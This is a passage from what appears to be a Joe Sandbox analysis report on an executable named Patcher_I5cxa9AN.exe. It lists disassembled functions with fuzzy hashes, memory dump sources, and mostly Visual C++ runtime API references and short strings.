Instruction ID: c9d769c883bdc4d3866ec8d9996921ba3fed017eb60731f3e078d9a6710b7e0b
Opcode Fuzzy Hash: 44641c6012d227436016701ab0cbe60db6c6aff2245b51325b593a2783b023ac
Instruction Fuzzy Hash: 91E0AB3691C3608EC3009E3C940012FA3A3EBC3318F05AA7CC1D497B80C638C2068B99

Function 6CE0F885 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ab6827daf5e30fd9c7f7dbcc78379a00d2117b79ed05a895f9f5770349d8fef
Instruction ID: 29ecddea4e2e84ed177ddf0a26dd51ab98c0e6e2a993fe91d8df44fc8e692b6d
Opcode Fuzzy Hash: 4ab6827daf5e30fd9c7f7dbcc78379a00d2117b79ed05a895f9f5770349d8fef
Instruction Fuzzy Hash: F7F0F2B09197008BE7048F28C40475BBBF0AB86348F21A92CE5A49B264CB76D419CB86

Function 6CE39800 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f3dccc562e08723b83ecc80f076e71ac533726ffbf360d139fdbc8ca4b4fba
Instruction ID: 0eb129394729a8ad354e55379fe48a5d8d9c487fb13a0c0056124facf0ad5caa
Opcode Fuzzy Hash: 10f3dccc562e08723b83ecc80f076e71ac533726ffbf360d139fdbc8ca4b4fba
Instruction Fuzzy Hash: BBD05E58F04180674418BA3D9D9BC377EBCD683204F84227CEC826B38AE500DC2987EF

Function 6CE18710 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 711e4c1e007118a5cbdae88afc3de14cfab9f39c428a9b4816c8bc710a499d5d
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 03D0973050D7A00E97088C3810A043BFBF9E94305AB30208FE4E1E3504C220D81142A9

Function 6CE3A020 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09e16e39bd158200689021e768aa96c2a469fb251d214a8ac074855538505001
Instruction ID: a90e04103e20463bd89eb02745161b108c07718b9520ac731c1ad4bd8e60fa46
Opcode Fuzzy Hash: 09e16e39bd158200689021e768aa96c2a469fb251d214a8ac074855538505001
Instruction Fuzzy Hash: B6D0A928A01000274118AB3AED8BC377A7D8683208B042038E842D7391D8009C2982EE

Function 6CDE93B9 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6CDE94B6
type_info::operator==.LIBVCRUNTIME ref: 6CDE94D8
___TypeMatch.LIBVCRUNTIME ref: 6CDE95E7
IsInExceptionSpec.LIBVCRUNTIME ref: 6CDE96B9
_UnwindNestedFrames.LIBCMT ref: 6CDE973D
CallUnexpected.LIBVCRUNTIME ref: 6CDE9758

Strings

csm, xrefs: 6CDE93F6
csm, xrefs: 6CDE950F
csm, xrefs: 6CDE9463

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 63b4f42263378c26b2b59812ff0d242cfa2383ee622a8795dfdfc80806278b92
Instruction ID: a88b5fc3b9f230878774d0329d8670a5fe48cf5c4e293de2a6eeaf1061533542
Opcode Fuzzy Hash: 63b4f42263378c26b2b59812ff0d242cfa2383ee622a8795dfdfc80806278b92
Instruction Fuzzy Hash: 76B16971C02209EFCF05DFA9D8809DEBBB5BF0C318B14465AE8156BA21D331EA55CFA5

Function 6CE30360 Relevance: 13.9, Strings: 11, Instructions: 132COMMON

Download Yara Rule

Strings

f, xrefs: 6CE30447
m, xrefs: 6CE3042E
z, xrefs: 6CE3045B
h, xrefs: 6CE30438
k, xrefs: 6CE30442
}, xrefs: 6CE30456
x, xrefs: 6CE30451
-, xrefs: 6CE3044C
e, xrefs: 6CE30429
Y, xrefs: 6CE3043D
\, xrefs: 6CE30433

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: -$Y$\$e$f$h$k$m$x$z$}
API String ID: 0-3917866455
Opcode ID: f8bbf7211bb075a44fbf752906b5df6f74c9fd8ad20085152ced51eae8c46823
Instruction ID: eb010635775a2e877934680e7ff0ca33fd1016f731b6953aa0acd2bce93b1937
Opcode Fuzzy Hash: f8bbf7211bb075a44fbf752906b5df6f74c9fd8ad20085152ced51eae8c46823
Instruction Fuzzy Hash: A641AD7164C7808EE300AFB8D88935FBEE19B82308F18897DE4D886792D77D8549C763

Function 6CE0465C Relevance: 13.8, Strings: 11, Instructions: 97COMMON

Download Yara Rule

Strings

vNoL, xrefs: 6CE046CC
~L|, xrefs: 6CE04744
&J2H, xrefs: 6CE046D6
U&T$, xrefs: 6CE04699
).D,, xrefs: 6CE0468B
T*Y(, xrefs: 6CE04692
2vEt, xrefs: 6CE04758
`VwT, xrefs: 6CE04708
;FD, xrefs: 6CE046E0
0z4x, xrefs: 6CE0474E
:r9p, xrefs: 6CE04762

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: &J2H$).D,$0z4x$2vEt$:r9p$;FD$T*Y($U&T$$`VwT$vNoL$~L|
API String ID: 0-4239551822
Opcode ID: fff0f1ab5ba63975767865b4a51af05757c8f4962c5a1291f747e31920f395b4
Instruction ID: 65b2e4ae326bd4f2718a34066b2c4ca91b3e591885beec178e9ac0a8f9137ea6
Opcode Fuzzy Hash: fff0f1ab5ba63975767865b4a51af05757c8f4962c5a1291f747e31920f395b4
Instruction Fuzzy Hash: 8951CAB0146B44CEE335CF668591B93BAE0BB11704F508E1CC2FB6A664C7B5A056CF95

Function 6CE1ED80 Relevance: 11.3, Strings: 9, Instructions: 98COMMON

Download Yara Rule

Strings

O(Z., xrefs: 6CE1EDDB
0DEZ, xrefs: 6CE1EE33
F$\:, xrefs: 6CE1EDF3
T0P6, xrefs: 6CE1EE0B
c<N2, xrefs: 6CE1EE03
3L)B, xrefs: 6CE1EE23
&@7F, xrefs: 6CE1EE2B
z, xrefs: 6CE1EDAB
G8U>, xrefs: 6CE1EDFB

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: &@7F$0DEZ$3L)B$F$\:$G8U>$O(Z.$T0P6$c<N2$z
API String ID: 0-3798705922
Opcode ID: 519a0880a837ff6766baf095d3bf4e1c22db58bcc1b081d877b8bab8baf9f24c
Instruction ID: bf30d92c03cd3cde7995aec34b101a462adf5cfb223ca644e1531b8e1650e95c
Opcode Fuzzy Hash: 519a0880a837ff6766baf095d3bf4e1c22db58bcc1b081d877b8bab8baf9f24c
Instruction Fuzzy Hash: 59318BB450C701CBC310DF5498A526BBBF1EF82358F504A1CF6968BB60E339D158CB9A

Function 6CDE8450 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6CDE8487
___except_validate_context_record.LIBVCRUNTIME ref: 6CDE848F
_ValidateLocalCookies.LIBCMT ref: 6CDE8518
__IsNonwritableInCurrentImage.LIBCMT ref: 6CDE8543
_ValidateLocalCookies.LIBCMT ref: 6CDE8598

Strings

csm, xrefs: 6CDE852D

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e39129be2eb62b99e6b223162fd5ca20aefd3651f23e0c692bc32a147feae579
Instruction ID: 228fb0e6d7c9778a4fb1b4c48b4eca805ac5af2b36af51b107f8623dce824adc
Opcode Fuzzy Hash: e39129be2eb62b99e6b223162fd5ca20aefd3651f23e0c692bc32a147feae579
Instruction Fuzzy Hash: B0417234A01258DBCF00CF6CCC84A9EBBB5EF4932CF10815AD824AB761DB31DA55CBA1

Function 6CDED31A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,6CDED429,00000000,6CDEAC30,00000000,00000000,00000001,?,6CDED5A2,00000022,FlsSetValue,6CDF4678,6CDF4680,00000000), ref: 6CDED3DB

Strings

ext-ms-, xrefs: 6CDED385
api-ms-, xrefs: 6CDED371

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 09e4ff33f6463b5da84caa61039629811951b4edd6cdde75c6e1d0ae1155a3cf
Instruction ID: 1aa39a05a676ce185e86ef4036ccee9ee63e481866b59e8a752133e0415c630a
Opcode Fuzzy Hash: 09e4ff33f6463b5da84caa61039629811951b4edd6cdde75c6e1d0ae1155a3cf
Instruction Fuzzy Hash: 5121A831B45610FBDB11AF25DC40A4E7779EB8B368B260215E925A7A90DF30E905C6F1

Function 6CDE8A07 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6CDE8631,6CDE7720,6CDE7139,?,6CDE7371,?,00000001,?,?,00000001,?,6CDF8428,0000000C,6CDE746A), ref: 6CDE8A15
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDE8A23
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDE8A3C
SetLastError.KERNEL32(00000000,6CDE7371,?,00000001,?,?,00000001,?,6CDF8428,0000000C,6CDE746A,?,00000001,?), ref: 6CDE8A8E

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c95c92e9b4571b6f5fff42e79b9915baa97c59206600097e68662bd3fb8123e2
Instruction ID: 09844a1fdd294013b24c3b8493138dee6bd1f037cea3b7f1c5b333a0b6606a37
Opcode Fuzzy Hash: c95c92e9b4571b6f5fff42e79b9915baa97c59206600097e68662bd3fb8123e2
Instruction Fuzzy Hash: 7A01AC323097619EAB151B7DACC499A37B8FB0F7BD724432BF52095DF0EF52480595A0

Function 6CE21430 Relevance: 8.9, Strings: 7, Instructions: 128COMMON

Download Yara Rule

Strings

3[0U, xrefs: 6CE214AA
5g7a, xrefs: 6CE214DC
2_Y, xrefs: 6CE214A0
7o>i, xrefs: 6CE214C8
7k, xrefs: 6CE214D2
({)u, xrefs: 6CE214FA
_~7, xrefs: 6CE2165D

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: ({)u$2_Y$3[0U$5g7a$7k$7o>i$_~7
API String ID: 0-1483910529
Opcode ID: 2b820bf1f48f7a15b5878a6aeaf6a260bb40cef50e36c6fbef9e211a8d6986cc
Instruction ID: 7d073c06a1b435e2aeb28ca5e1f869e13dc4e0f80fdd139241a0232ec1aa2c4d
Opcode Fuzzy Hash: 2b820bf1f48f7a15b5878a6aeaf6a260bb40cef50e36c6fbef9e211a8d6986cc
Instruction Fuzzy Hash: 935167B5E442298FEB24CF65CC42BDEBBB2AB51304F1481DED049BB341D7B84A818F49

Function 6CDEC54E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\Patcher_I5cxa9AN.exe, xrefs: 6CDEC56A

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe
API String ID: 0-3496734076
Opcode ID: a757055fb2fdd33d0641f251aae3d26c92d4e28c992341cc10008f3aa68ea7d0
Instruction ID: facd6f6e5c42d1d28abb34acec1e3c0c3dd2c358e34c95a7f32070ff0ae63bda
Opcode Fuzzy Hash: a757055fb2fdd33d0641f251aae3d26c92d4e28c992341cc10008f3aa68ea7d0
Instruction Fuzzy Hash: F4216271204605BFDB20BF66CC50D9B7FADAF893687048619E91897A70D730E810C7A1

Function 6CDE8F49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6CDE900A,00000000,?,00000001,00000000,?,6CDE9081,00000001,FlsFree,6CDF3D4C,FlsFree,00000000), ref: 6CDE8FD9

Strings

api-ms-, xrefs: 6CDE8F99

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: c44786e98229fed3ef043beda85f7b66b429428a0627508de84a5583c83ba54f
Instruction ID: 0710db3a3e6cf26909d8851aa4313156574984185bde62a924a65ac40128024d
Opcode Fuzzy Hash: c44786e98229fed3ef043beda85f7b66b429428a0627508de84a5583c83ba54f
Instruction Fuzzy Hash: 8911CA31A45520EBEF118B6C9C44B4A77F9AF0A778F160612FE24E76D0D730ED0086D5

Function 6CE1EEF0 Relevance: 8.8, Strings: 7, Instructions: 61COMMON

Download Yara Rule

Strings

O:B8, xrefs: 6CE1EF57
c.S,, xrefs: 6CE1EF2F
9F7D, xrefs: 6CE1EF7F
F6V4, xrefs: 6CE1EF5F
A^, xrefs: 6CE1EF8F
BN=L, xrefs: 6CE1EF6F
V"V , xrefs: 6CE1EF47

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: 9F7D$A^$BN=L$F6V4$O:B8$V"V $c.S,
API String ID: 0-3561881016
Opcode ID: 49c2233f8d2de4a4e9264ec9512c8353f5c1fdcb5dcb08e88206d82168858186
Instruction ID: da045541d80f809bf5efd3ca9e3e1962a59c416d32df91c994855c44e63e2589
Opcode Fuzzy Hash: 49c2233f8d2de4a4e9264ec9512c8353f5c1fdcb5dcb08e88206d82168858186
Instruction Fuzzy Hash: 9D21EEB054C3409BD314CF99809566FFBF5EB89718F408A1DB2958B251E3B986098B5B

Function 6CDEA55E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E7CFDE7A,00000000,?,00000000,6CDF2E62,000000FF,?,6CDEA4F8,?,?,6CDEA4CC,?), ref: 6CDEA593
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDEA5A5
FreeLibrary.KERNEL32(00000000,?,00000000,6CDF2E62,000000FF,?,6CDEA4F8,?,?,6CDEA4CC,?), ref: 6CDEA5C7

Strings

CorExitProcess, xrefs: 6CDEA59D
mscoree.dll, xrefs: 6CDEA58C

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 94b33df7e4e8de8ef42ea83826c56d91b53b4f3a83288a2cad0628fa1e7f5bb2
Instruction ID: 0acb66583fee4916f43c75402bb23613c657ab7a2ba7c41ea662db2ecaa3fcf2
Opcode Fuzzy Hash: 94b33df7e4e8de8ef42ea83826c56d91b53b4f3a83288a2cad0628fa1e7f5bb2
Instruction Fuzzy Hash: E801A231A00659EFEF019F40CC08BAEBBBCFB05719F124626E935E3690DB34D904CA51

Function 6CDEEFD5 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CDEF05A
__alloca_probe_16.LIBCMT ref: 6CDEF123
__freea.LIBCMT ref: 6CDEF18A

Part of subcall function 6CDEE17A: RtlAllocateHeap.NTDLL(00000000,6CDECAC7,6CDEDE94,?,6CDECAC7,00000220,?,?,6CDEDE94), ref: 6CDEE1AC

__freea.LIBCMT ref: 6CDEF19D
__freea.LIBCMT ref: 6CDEF1AA

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: cf94959bfc39627816e9c5aa36eb6038374175450d5b4d4d99ddec042d6df805
Instruction ID: 15f37a15bd3ce95db98449356fc5bc9967cc61af0d07c90226e6a0c9dba83a45
Opcode Fuzzy Hash: cf94959bfc39627816e9c5aa36eb6038374175450d5b4d4d99ddec042d6df805
Instruction Fuzzy Hash: 0151D67260160AEFEB104F64DC40EEB3AA9DF8D718B15052AFD18D7A70EB30CD5486B0

Function 6CE13EF0 Relevance: 6.5, Strings: 5, Instructions: 238COMMON

Download Yara Rule

Strings

/4, xrefs: 6CE13F87
6w, xrefs: 6CE13F8F
ic, xrefs: 6CE13FF5
a{, xrefs: 6CE13F7F
ic, xrefs: 6CE1412F, 6CE140B8

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: /4$6w$a{$ic$ic
API String ID: 0-573168150
Opcode ID: 8035aeae8720a0d68b51cf620da5fc36368bed7e53a4547f443ab50661ffa11e
Instruction ID: c96cff4d7789635bbbf4ff88cfe166bc04e5c8e796bfa03c6d5b767c5f10a52a
Opcode Fuzzy Hash: 8035aeae8720a0d68b51cf620da5fc36368bed7e53a4547f443ab50661ffa11e
Instruction Fuzzy Hash: 5151BCB50083518BD310CF19C8A13ABBBF1EF86328F144A5DE5E14BB90E3799915CB93

Function 6CE04D70 Relevance: 6.4, Strings: 5, Instructions: 116COMMON

Download Yara Rule

Strings

qw, xrefs: 6CE04D9F
><, xrefs: 6CE04F6A
Ur[p, xrefs: 6CE04EAF
20, xrefs: 6CE04F5F
09, xrefs: 6CE04DAF

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: 09$Ur[p$qw$20$><
API String ID: 0-1156490904
Opcode ID: a8020708e123d62a2f4719b0a356841bb01bdb86f7a70c960633a322ed400623
Instruction ID: 4f76f8690ffb16bf42f1be8e2edff86f64a29c586eb3abd2c4cfea0f00d5e71b
Opcode Fuzzy Hash: a8020708e123d62a2f4719b0a356841bb01bdb86f7a70c960633a322ed400623
Instruction Fuzzy Hash: CF51EAB1119381CBE335CF55C581B9FBBA1BB91340F208A0CD6E92B265DBB08455CF9B

Function 6CDEF6E2 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(E7CFDE7A,00000000,00000000,?), ref: 6CDEF745

Part of subcall function 6CDED11C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CDEF180,?,00000000,-00000008), ref: 6CDED17D

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CDEF997
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CDEF9DD
GetLastError.KERNEL32 ref: 6CDEFA80

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 366b6b29c903fe82fbd1ea67ab79120f6e3e5703e6a4f9a4a2f67daf6dbbad08
Instruction ID: 031c605c727ab332eafa52e240340f3852fec3ad78105b45d7a1a01a671e9692
Opcode Fuzzy Hash: 366b6b29c903fe82fbd1ea67ab79120f6e3e5703e6a4f9a4a2f67daf6dbbad08
Instruction Fuzzy Hash: 60D189B5E00258AFCB11CFA8D8C0A9DBBB9FF0D314F24452AE465AB761D730A902CB50

Function 6CDE9162 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6CDE9229
___AdjustPointer.LIBCMT ref: 6CDE924C
___AdjustPointer.LIBCMT ref: 6CDE92E8

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
